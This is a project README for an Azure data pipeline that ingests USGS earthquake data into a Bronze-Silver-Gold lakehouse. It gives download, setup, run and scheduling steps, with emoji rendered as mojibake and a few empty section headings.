Uday-hash-bit

🌍 Earthquake-Data-Engineering-Pipeline-on-Azure - Analyze Earthquake Data Easily

Download

πŸ“‹ Overview

The Earthquake Data Engineering Pipeline on Azure provides a full solution for analyzing real-time earthquake data. This app connects to the USGS API, processes the data, and stores it using a Bronze–Silver–Gold lakehouse architecture. You can run it manually or set it up for daily automated updates.

πŸ› οΈ Features

πŸš€ Getting Started

Follow these steps to set up your Earthquake Data Pipeline:

πŸ–₯️ System Requirements

πŸ“₯ Download & Install

To download the application, please visit the link below:

Download Earthquake Data Engineering Pipeline

  1. Click the link above to go to the Releases page.
  2. Find the latest version listed at the top.
  3. Download the ZIP file or other available packages for your operating system.
  4. Extract the files to a location of your choice.

πŸ“‚ Setting Up

  1. Open the extracted folder.
  2. Follow the included instructions for setting up an Azure environment.
  3. Make sure you configure any necessary Azure services before proceeding.

πŸ› οΈ Configuration

βš™οΈ Azure Setup

  1. Azure Data Factory: Set up a Data Factory instance to orchestrate the data pipeline.
  2. Databricks: Create a Databricks workspace for data analysis and transformation.
  3. ADLS Gen2: Configure Azure Data Lake Storage Gen2 to store your raw and processed data.
  4. Synapse Analytics: Set up a Synapse instance to facilitate data querying and visualization.

πŸ”‘ API Key

Obtain an API key from USGS to access the earthquake data:

  1. Visit the USGS API website.
  2. Register for an API key if required.
  3. Save your API key in a secure location for later use.

πŸ“Š How to Use

πŸ„β€β™‚οΈ Running the Pipeline

  1. Open your command line or terminal.
  2. Navigate to the directory where you extracted the files.
  3. Use the following command to run the application:
    python run_pipeline.py
    
  4. Monitor the output for any errors, and check your Azure configurations.

πŸ“… Scheduling Jobs

To set up daily-triggered workflows:

  1. Use Azure Data Factory’s scheduling features.
  2. Configure triggers based on your requirements for data ingestion.

πŸ“ˆ Monitoring and Analysis

You can visualize the processed data using Azure Synapse Analytics or Power BI. Set up dashboards to analyze trends and gain insights into earthquake activities.

πŸ“ƒ Documentation

A detailed guide on all pipeline configurations and parameters can be found in the documentation folder included in the download.

πŸ§‘β€πŸ€β€πŸ§‘ Support and Community

If you need help using the Earthquake Data Engineering Pipeline, you can:

πŸ“š Additional Resources

βš–οΈ License

This project is licensed under the MIT License. Please see the LICENSE file for more details.

🧾 Acknowledgements

Thanks to the Azure community for providing amazing tools and support. Thanks also to the USGS for the valuable earthquake data.


Get started today by visiting the Download page and launching your analysis of earthquake data with ease!